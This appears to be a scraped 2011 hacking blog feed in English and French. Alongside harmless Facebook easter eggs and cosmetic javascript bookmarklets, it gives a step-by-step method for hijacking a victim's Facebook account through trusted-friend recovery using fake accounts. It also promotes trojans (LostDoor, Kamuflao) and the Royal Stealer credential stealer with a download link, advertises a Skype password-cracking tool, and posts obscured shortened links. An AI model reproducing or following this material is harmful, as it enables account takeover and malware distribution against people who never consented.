Make text bold or underlined in facebook chat: use *stars* for<strong> bold text</strong>, and _underscores_ for <span style="text-decoration: underline;">underlined</span>. There is no way to get <em>italic text</em> on facebook<em>;</em> see <a href="http://www.puremango.co.uk/2009/05/hacking-facebook/#comment-483" target="_self">my comment here</a> about facebook chat italics.<br />
<strong>That’s all the hacks I’ve found (but I know there are more). </strong>In fact, it’s possible to get your friends to “like”, or “unlike” items, and I think it would be possible to get them to comment and more, but the complexity of the javascript makes it not worth doing, plus you have to get them to paste code into their address bar – there’s no way to do it without getting them to do that.<br />
<h3>Facebook Easter Egg: Pirate Language</h3><img alt="" class="alignnone" height="181" src="http://www.puremango.co.uk/hacking_facebook/pirate2.png" width="547" /><br />
Here’s a nice little facebook easter egg for you: Go to the <a href="http://www.facebook.com/editaccount.php?language" target="_blank">language settings page</a> and scroll to the bottom of the list of languages, and somewhere around there you should see “English (Pirate)” in the list of supported languages.<br />
Choose that language option and avast ye sails fer much facebook silliness.<br />
<strong>Facebook Easter Egg: Konami</strong><br />
This one is awesome, thanks to Jim in the comments for letting me know about it.<br />
Click in your status update box and type the following: [up] [up] [down] [down] [left] [right] [left] [right] b a [enter], and then click anywhere on the page to see lensflares:<br />
<img alt="" height="597" src="http://www.puremango.co.uk/hacking_facebook/konami.png" width="535" /><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-17566140826565720132011-07-06T11:56:00.000+02:002011-07-06T11:56:23.123+02:00Hack4u: How To Hack Your Facebook Account with Greasemonkey & Javascripthttp://adf.ly/2189a<div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-38920081898244618502011-07-06T11:55:00.000+02:002011-07-06T11:55:30.420+02:00How To Hack Your Facebook Account with Greasemonkey & JavascriptFacebook is pretty awesome, but it is far from perfect. More than once, I’ve heard complaints about some of Facebook’s technical aspects. Sadly, Facebook isn’t open-sourced, so users can’t change anything themselves – or can they?<br />
By using simple pieces of Javascript code, or by applying Firefox Greasemonkey userscripts, users can change the appearance and workings of Facebook themselves.<br />
Learn how to hack Facebook accounts for fun, or tweak something useful. Believe me, it really <em>is</em> all in your hands.<br />
<h2><strong>Facebook Account Javascript Hacks</strong></h2>In these following hacks we’ll be using basic Javascript to toy around with Facebook. Note that we’re <strong>not</strong> going to hack <em>into</em> Facebook accounts, or anything of the like. Most of these ‘hacks’ are temporary and will disappear once you refresh the page. They also won’t be visible to users on other computers. So why are we doing it? – Because it’s fun!<br />
<div style="text-align: center;"><img alt="how to hack facebook accounts" class="aligncenter" height="35" src="http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/10/10-10-2009-20-28-06.png?54167" width="344" /></div>These Javascript snippets, which we’ll supply below, simply need to be <strong>pasted into the address bar</strong>. Hit enter, <em>et voila!</em><br />
<h3><strong>Changing Profile Colour</strong></h3>This will change the colour of your Facebook bar to a color of choice.<br />
<div style="text-align: center;"><img alt="facebook greasemonkey scripts" class="aligncenter" height="34" src="http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/10/10-10-2009-20-33-26.png?54167" width="474" /></div>Just paste the following code in your address bar and hit enter. You can replace <em>‘red’</em> with any color you want – black, white, green or even orrange. If you want to reverse the effect, press Ctrl+F5 for a hard reload of the page.<br />
<span style="color: #003366;"><code>javascript:void(document.getElementById('fb_menubar').style.background='red');</code></span><br />
<h3><strong>View Chat History with Offline Friends</strong></h3>Unfortunately, you can’t normally view the chat history of online friends. If you’re trying to remember something that was said, waiting for them to come back online is one hell of a bother. Instead, you can just use this – pretty useful – Javascript hack.<br />
First of all, we need to get your friend’s Facebook ID. When you visit his page indirectly (through your friends list or by using the search engine), you’ll be able to see it as a number in the address bar.<br />
<div style="text-align: center;"><img alt="how to hack facebook" class="aligncenter" height="33" src="http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/10/10-10-2009-20-41-28.jpg?54167" width="382" /></div>Another way to retrieve someone’s ID is by going to the <em>Friends</em> widget on their page, and right-clicking <em>See All</em>. Then you’ll have to copy the link location and paste it in your address bar.<br />
<div style="text-align: center;"><img alt="how to hack facebook greasemonkey" class="aligncenter" height="224" src="http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/10/10-10-2009-20-47-17.jpg?54167" width="194" /></div>Once you’ve got someone’s ID, simply paste the following code in your address bar, replacing 1122334455 with the relevant number.<br />
<span style="color: #003366;"><code>javascript:buddyList.itemOnClick(1122334455);</code></span><br />
<div style="text-align: center;"><img alt="fb" class="aligncenter" height="309" src="http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/10/10-10-2009-20-53-18.jpg?54167" width="228" /></div><h3><strong>Other Javascript hacks</strong></h3>The preceding two hacks are without doubt the most impressive or useful ones. Below are some of the other tricks you can pull off by using Javascript. We’re not going to deep on this because they’re all things you can do manually as well.<br />
Change chat status to invisible:<br />
<span style="color: #003366;"><code>javascript:statusControl.sendVisibility(false);</code></span><br />
Change chat status to visible:<br />
<span style="color: #003366;"><code>javascript:statusControl.sendVisibility(true);</code></span><br />
Close all chat windows with person 1122334455:<br />
<span style="color: #003366;"><code>javascript:chatDisplay.tabs[1122334455].tabXOnClick();</code></span><br />
Open application tab:<br />
<span style="color: #003366;"><code>javascript:applicationDock.toggleTab();</code></span><br />
Bring up notifications:<br />
<span style="color: #003366;"><code>javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');</code></span><br />
Bring up friends list:<br />
<span style="color: #003366;"><code>javascript:buddyList.toggleTab();</code></span><br />
<h2><strong><br />
</strong></h2><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-75092156614867750272011-07-03T20:45:00.000+02:002011-07-03T20:45:28.179+02:00pirater facebook facilement<div dir="ltr" style="text-align: left;" trbidi="on">Pirater un compte Facebook, est-ce vraiment si dur ? Pas vraiment si on en croit cette image qui m'a bien fait rire. La question n'est bien sûr pas de savoir réellement pirater un compte Facebook, vous vous doutez bien que je ne vais pas vous donner de solution. Mais l'image résume bien la situation : la prudence est la principale manière de se protéger contre le piratage et le hacking. Ne diffusez pas vos mots de passe, tout simplement !<br />
<br />
<img alt="password facebook" src="http://moderateur.blog.regionsjob.com/public/images_7/.passwordfacebook_m.jpg" style="display: block; margin: 0pt auto;" /></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-34873076489434973862011-07-02T14:00:00.000+02:002011-07-02T14:00:52.969+02:00en 5 minute vous pirater un compte msn tres facile<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/DkUa0vR2cWc?feature=player_embedded' frameborder='0'></iframe></div><br />
</div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com1tag:blogger.com,1999:blog-9125256643521451143.post-59524700462842702552011-07-02T13:56:00.001+02:002011-07-05T01:26:10.524+02:00pirater wifi<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/w8610KPUt6k?feature=player_embedded' frameborder='0'></iframe></div><br />
</div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-63807701711569172612011-07-02T13:52:00.002+02:002011-07-05T01:28:05.169+02:00Msn Kamuflao Beta 3r1<div dir="ltr" style="text-align: left;" trbidi="on"><h3 class="tags"> </h3><div class="entry clear"><a href="http://www.piratermsn.com/wp-content/uploads/2009/06/kamuflao.jpg"><img alt="kamuflao" class="alignleft size-medium wp-image-142" height="251" src="http://www.piratermsn.com/wp-content/uploads/2009/06/kamuflao-300x251.jpg" title="kamuflao" width="300" /></a>Les chevaux de Troie bien avec de nombreuses options pour contrôler le messager d’un autre PC, de visualiser des fichiers, supprimer des fichiers, voler msn, msn changement de statut, d’ouvrir des négociations avec d’autres personnes etc …</div></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-35086957965425946262011-07-02T13:08:00.000+02:002011-07-02T13:08:50.182+02:00HACKING FACEBOOK WITH FORGET PASSWORD<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: center;"><span class="Apple-style-span" style="background-color: black; color: white; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;">1. Go to Facebook.com and hit on Forgot Password link to get this page</span><span class="Apple-style-span" style="font-size: 12px; line-height: 20px;"></span></div><div><span class="Apple-style-span" style="color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><span class="Apple-style-span" style="color: #9a9a9a; font-family: Arial, Verdana; font-size: 12px; line-height: 20px;"><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><a href="http://1.bp.blogspot.com/-9NElObUGpbM/TgXmYs7VbMI/AAAAAAAAAYo/rS2-IGbZL6o/s1600/1.JPG" imageanchor="1" style="color: #ff3b3b; margin-left: 1em; margin-right: 1em; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"><img border="0" src="http://1.bp.blogspot.com/-9NElObUGpbM/TgXmYs7VbMI/AAAAAAAAAYo/rS2-IGbZL6o/s1600/1.JPG" style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(85, 84, 84); border-bottom-style: none; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(85, 84, 84); border-left-style: none; border-left-width: 1px; border-right-color: rgb(85, 84, 84); border-right-style: none; border-right-width: 1px; border-top-color: rgb(85, 84, 84); border-top-style: none; border-top-width: 1px; border-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /></a></span></div></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;">2. You have to enter the email of the victim, or even the Facebook profile name will do. Facebook will search for profile name and you will be shown the account. Hit on <b>"This is my account”</b> </span><br />
<div style="text-align: center;"><span class="Apple-style-span" style="color: #9a9a9a; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"><a href="http://1.bp.blogspot.com/-1HbZU-vgAmI/TgXmqa8JbpI/AAAAAAAAAYs/cBVhjBRqudY/s1600/2.JPG" imageanchor="1" style="color: #ff3b3b; margin-left: 1em; margin-right: 1em; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"><img border="0" src="http://1.bp.blogspot.com/-1HbZU-vgAmI/TgXmqa8JbpI/AAAAAAAAAYs/cBVhjBRqudY/s1600/2.JPG" style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(85, 84, 84); border-bottom-style: none; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(85, 84, 84); border-left-style: none; border-left-width: 1px; border-right-color: rgb(85, 84, 84); border-right-style: none; border-right-width: 1px; border-top-color: rgb(85, 84, 84); border-top-style: none; border-top-width: 1px; border-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /></a></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;">3. On the next page, hit on <b>"No longer have access to these”</b>. </span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #9a9a9a; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"><a href="http://1.bp.blogspot.com/-ePgDCEka4sw/TgXnCZPTfhI/AAAAAAAAAYw/keo6g1S91cM/s1600/3.JPG" imageanchor="1" style="color: #ff3b3b; margin-left: 1em; margin-right: 1em; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"><img border="0" src="http://1.bp.blogspot.com/-ePgDCEka4sw/TgXnCZPTfhI/AAAAAAAAAYw/keo6g1S91cM/s1600/3.JPG" style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(85, 84, 84); border-bottom-style: none; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(85, 84, 84); border-left-style: none; border-left-width: 1px; border-right-color: rgb(85, 84, 84); border-right-style: none; border-right-width: 1px; border-top-color: rgb(85, 84, 84); border-top-style: none; border-top-width: 1px; border-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /></a></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;">4. You will be prompted for email address. Enter your email address here and hit on <b>"Submit”</b>.</span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #9a9a9a; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"><a href="http://4.bp.blogspot.com/-MA_LGAwrgPw/TgXnT0Jfk9I/AAAAAAAAAY0/fC2GBbINCMc/s1600/4.JPG" imageanchor="1" style="color: #ff3b3b; margin-left: 1em; margin-right: 1em; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"><img border="0" src="http://4.bp.blogspot.com/-MA_LGAwrgPw/TgXnT0Jfk9I/AAAAAAAAAY0/fC2GBbINCMc/s1600/4.JPG" style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(85, 84, 84); border-bottom-style: none; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(85, 84, 84); border-left-style: none; border-left-width: 1px; border-right-color: rgb(85, 84, 84); border-right-style: none; border-right-width: 1px; border-top-color: rgb(85, 84, 84); border-top-style: none; border-top-width: 1px; border-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /></a></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;">5.Facebook will ask you ask you to answer the Security question. No worries here. Just enter the wrong answer 3 times</span></div><span class="Apple-style-span" style="color: #9a9a9a; font-size: 12px; line-height: 20px;"><div class="separator" style="clear: both; font-family: Arial, Verdana; text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><a href="http://4.bp.blogspot.com/-jNJYGBmk7cA/TgXnsPtW9DI/AAAAAAAAAY4/P2rIEH5PfgE/s1600/5.JPG" imageanchor="1" style="color: #ff3b3b; margin-left: 1em; margin-right: 1em; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"><img border="0" src="http://4.bp.blogspot.com/-jNJYGBmk7cA/TgXnsPtW9DI/AAAAAAAAAY4/P2rIEH5PfgE/s1600/5.JPG" style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(85, 84, 84); border-bottom-style: none; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(85, 84, 84); border-left-style: none; border-left-width: 1px; border-right-color: rgb(85, 84, 84); border-right-style: none; border-right-width: 1px; border-top-color: rgb(85, 84, 84); border-top-style: none; border-top-width: 1px; border-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /></a></span></div><div class="separator" style="clear: both; font-family: Arial, Verdana; text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div></span><div style="text-align: center;"><span class="Apple-style-span" style="color: #9a9a9a; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"><a href="http://1.bp.blogspot.com/-4xyaR5BPeP4/TgXn4okRMUI/AAAAAAAAAY8/Hze_Tfo14KU/s1600/6.JPG" imageanchor="1" style="color: #ff1313; margin-left: 1em; margin-right: 1em; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"><img border="0" src="http://1.bp.blogspot.com/-4xyaR5BPeP4/TgXn4okRMUI/AAAAAAAAAY8/Hze_Tfo14KU/s1600/6.JPG" style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(85, 84, 84); border-bottom-style: none; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(85, 84, 84); border-left-style: none; border-left-width: 1px; border-right-color: rgb(85, 84, 84); border-right-style: none; border-right-width: 1px; border-top-color: rgb(85, 84, 84); border-top-style: none; border-top-width: 1px; border-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /></a></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;">7. Now comes the real hacking part. After hitting on Continue, Facebook will ask you to select the 3 Trusted Friends. Your 3 fake accounts (created previously) will be listed in the Friends list of the victim. Select those 3 Fake accounts. Facebook will send security codes to these Fake accounts (which are our accounts). Now, enter the 3 security codes. Facebook will send Password Recovery Email at your email you’ve entered in Step 4. You can easily change password of your friend’s account. </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"> </span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"><span class="Apple-style-span" style="color: red;"><b>Note: </b></span>The victim will be emailed about the password change. So, this method of hacking Facebook account is useful only for those whose victim does not check emails regularly.</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;">BY chnayder</span></div></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-24184075429994191682011-07-02T12:30:00.001+02:002011-07-05T01:28:40.562+02:00LostDoor 4.0 Pro<div dir="ltr" style="text-align: left;" trbidi="on">Aujourd’hui est sorti la nouvelle version de Lost porte, les pro v4.0, un cheval de Troie avec de nombreux outils.<br />
Cette nouvelle version ajoute une propagation automatique de MSN, vous obtenez la fenêtre active, l’amélioration de l’interface graphique, et de “dire” afin d’améliorer la stabilité. <br />
Le cheval de Troie est connu pour ses 3 à tartiner, P2P, MSN, et USB. Son interface est très simple et est aussi en espagnol, il devrait être facile à utiliser.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc75mOMjfGNdz-XoiYGBwDMJuskDNF20uSQHQHeaa7POiqPy5oma1-_JQyKSCUuk89CNfw1nRyMjcb7TkSexwC7_BFz0UfVHHc4TEI3Fqr7Yu9h3Ao4p2emTe8KJENyO6a1iePDoDYQho/s1600/lost8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc75mOMjfGNdz-XoiYGBwDMJuskDNF20uSQHQHeaa7POiqPy5oma1-_JQyKSCUuk89CNfw1nRyMjcb7TkSexwC7_BFz0UfVHHc4TEI3Fqr7Yu9h3Ao4p2emTe8KJENyO6a1iePDoDYQho/s320/lost8.png" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaSDI1phA0umpYN32_TnA1owCTvfWH-TQiNg3azdM2x8jud_LLaHSav9bqzlKw1halQ40QKe041A1AYtcUfm4_2wSOjZOjpl6geD1MMo_VeTovwRm1lJ-itADhQ60GRHUzcitIffBdHlw/s1600/lost2-236x300.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaSDI1phA0umpYN32_TnA1owCTvfWH-TQiNg3azdM2x8jud_LLaHSav9bqzlKw1halQ40QKe041A1AYtcUfm4_2wSOjZOjpl6geD1MMo_VeTovwRm1lJ-itADhQ60GRHUzcitIffBdHlw/s1600/lost2-236x300.png" /></a></div></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com1tag:blogger.com,1999:blog-9125256643521451143.post-71571224815810576662011-07-02T12:07:00.000+02:002011-07-02T12:07:16.437+02:00Royal Stealer 2.0<div dir="ltr" style="text-align: left;" trbidi="on">Came la nouvelle version de la Royal Stealer 2, développé par un programmeur Stealer espagnol. Contrairement à sa précédente version Royal Stealer, ce qui soulève les logs vers un serveur FTP, ce qui évite l’utilisation de comptes de messagerie. <br />
Également ajouté la possibilité de propagation de Stealer par Ares et Emule et vous permet de choisir où sauvegarder le Stealer pour démarrer avec des fenêtres, cette option n’est pas toujours très recommandé, car qui ne fait que remplir le serveur FTP .<br />
Le Royal 2 Stealer journaux ou envoyer le mot de passe suivant:<br />
MSN messenger, Live messenger.<br />
Firefox<br />
Internet Explorer<br />
Jeu CD-Keys<br />
CD-Keys de Logiciels<br />
No-Ip<br />
Les journaux sont également envoyées cryptées, il est donc nécessaire d’utiliser le visualiseur de l’onglet du journal de l’outil pour les voir. Les unités ont été ajoutées à la téléchargements nécessaires à l’exploitation sur n’importe quel ordinateur.<br />
<br />
<br />
<div style="color: #cc0000; font-family: "Courier New",Courier,monospace;"><u><i><span style="font-size: large;">Pour télecharger cliquer ici :</span></i></u></div><u style="color: #cc0000;"><i><span style="font-size: large;"><span style="font-family: "Courier New",Courier,monospace;">http://telecharge.piratermsn.com/?id=35</span></span></i></u><br />
<br />
</div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-28206089034654529202011-07-02T11:38:00.000+02:002011-07-02T11:38:22.226+02:00Pirater compte skype<div dir="ltr" style="text-align: left;" trbidi="on">Le groupe de Hacker <strong>Faceback </strong>vient de créer un logiciel capable de téléphoner <strong>gratuitement </strong>sur les téléphones portables à partir de <strong>Skype</strong>. Mais en plus il trouve <strong>les mots de passe </strong>des comptes Skype.<br />
Le logiciel est vraiment très simple d’utilisation et très intuitif. Vous pourrez infiltrer tout les comptes Skype que vous voudrez!<br />
Le programme est en téléchargement pour une durée limité, car nous ne voulons pas que le logiciel soit trop connu.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoFhXzPLr3jOCnW0yCxBgE8XUx4gpLvPJEukMl9mgrktL0vvFQIVk_M2rTLNQmjPJ6lj82M85KshKyGsBnk9zJLGPAd17Pyx0c8iHZpjS4yvA3OB05-5D8zkyQsgfCU8FN8G4mQ7YAgOg/s1600/hackingskype.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoFhXzPLr3jOCnW0yCxBgE8XUx4gpLvPJEukMl9mgrktL0vvFQIVk_M2rTLNQmjPJ6lj82M85KshKyGsBnk9zJLGPAd17Pyx0c8iHZpjS4yvA3OB05-5D8zkyQsgfCU8FN8G4mQ7YAgOg/s320/hackingskype.jpg" width="320" /> </a></div><div class="separator" style="clear: both; text-align: center;">http://msnhack.centerblog.net/2-pour-pirater-un-compte-skype-facilement </div><br />
</div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-35855932537374773862011-07-02T10:57:00.001+02:002011-07-02T10:57:45.686+02:00Pirater facilement<div dir="ltr" style="text-align: left;" trbidi="on"><span style="color: #990000;"><span style="font-size: x-large;"><span style="font-family: Times,"Times New Roman",serif;"><u><i><b>It's good to do this and easy :</b></i></u></span></span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1SmUuydHbYKUPPuknsKTIpmoK9n3YTuSanMx9hMXroSzDYeG1sm-DglIdgcuTyYpqqoFsCmMp5Stc1GqUuItFgrhxEB2SubB15FI2aMHEwvQO5zgdeT25ZmOWzV6qRjJfgiVCyYgw2l8/s1600/images.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1SmUuydHbYKUPPuknsKTIpmoK9n3YTuSanMx9hMXroSzDYeG1sm-DglIdgcuTyYpqqoFsCmMp5Stc1GqUuItFgrhxEB2SubB15FI2aMHEwvQO5zgdeT25ZmOWzV6qRjJfgiVCyYgw2l8/s1600/images.jpeg" /></a></div><span style="color: #990000;"><span style="font-size: x-large;"><span style="font-family: Times,"Times New Roman",serif;"><u><i><b> </b></i></u></span></span></span>https://www.facebook.com/posted.php?id=110384748998455&share_id=127027474009855&comments=1</div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com1tag:blogger.com,1999:blog-9125256643521451143.post-80411713668522468652011-07-02T10:56:00.000+02:002011-07-02T10:56:08.094+02:00Enjoy your self<div dir="ltr" style="text-align: left;" trbidi="on"><span style="font-size: x-large;"><span style="font-family: Times,"Times New Roman",serif;">Let's do this together :</span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKRHcj8cXJSkAY_LpfLcpd5qRfMw7ZLWWXM3CdAcC8SKC-5V1x523bzE_ZQGApwXdKY_mHzj1bZzvrBJojIEuGhvrPYveEQCHY5VMwuEeBwLOTqjrPJ0fWWs8JK8feZtap1Jvky0bSbpw/s1600/0-U136z5Fw-sans-titrefjk-s-.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKRHcj8cXJSkAY_LpfLcpd5qRfMw7ZLWWXM3CdAcC8SKC-5V1x523bzE_ZQGApwXdKY_mHzj1bZzvrBJojIEuGhvrPYveEQCHY5VMwuEeBwLOTqjrPJ0fWWs8JK8feZtap1Jvky0bSbpw/s320/0-U136z5Fw-sans-titrefjk-s-.png" width="320" /></a></div><span style="font-size: x-large;"><span style="font-family: Times,"Times New Roman",serif;">https://www.facebook.com/posted.php?id=118574271520064 </span></span></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-18239773580960668042011-07-02T10:52:00.002+02:002011-07-05T01:29:58.173+02:00Pirater<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: center;"><u><span style="font-size: x-large;"><span style="font-family: Times, 'Times New Roman', serif;">Let's play </span></span>:</u></div><div style="text-align: center;"><u><br />
</u></div><div style="text-align: center;"><a href="http://adf.ly/20KYv">http://adf.ly/20KYv</a></div></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-43182048002239067272011-07-02T09:44:00.001+02:002011-07-02T09:51:42.629+02:00Bienvenue<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: center;"><u style="color: #660000;"><i><span style="font-size: x-large;">Bonne visite sur mon blog </span></i></u></div><div style="color: #660000; text-align: center;"><span style="font-size: x-large;"><u><i><span class="short_text" id="result_box" lang="en"><span class="hps" title="Cliquer
ici pour voir d'autres traductions">Enjoy your visit to</span> <span class="hps" title="Cliquer ici pour voir d'autres traductions">our blog</span></span></i></u></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR-SbEcGRIrPGHBTW8x4tygXJdW6pkILtAEZFofSbYWTNBkrdlUZJmhokVy6kEbmllsIS2kI5WL2M5_RdAauneTgU8LypN9ftjYQqt-dKPAU_PvnFxCOMQfGKZvmTfwaIOoY75egF4gFI/s1600/690539img-bienvenue-04.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR-SbEcGRIrPGHBTW8x4tygXJdW6pkILtAEZFofSbYWTNBkrdlUZJmhokVy6kEbmllsIS2kI5WL2M5_RdAauneTgU8LypN9ftjYQqt-dKPAU_PvnFxCOMQfGKZvmTfwaIOoY75egF4gFI/s1600/690539img-bienvenue-04.gif" /></a></div><a href="mailto:tlili.im6@gmail.com">tlili.im6@gmail.com</a><div style="color: #660000; text-align: center;"><br />
</div></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com2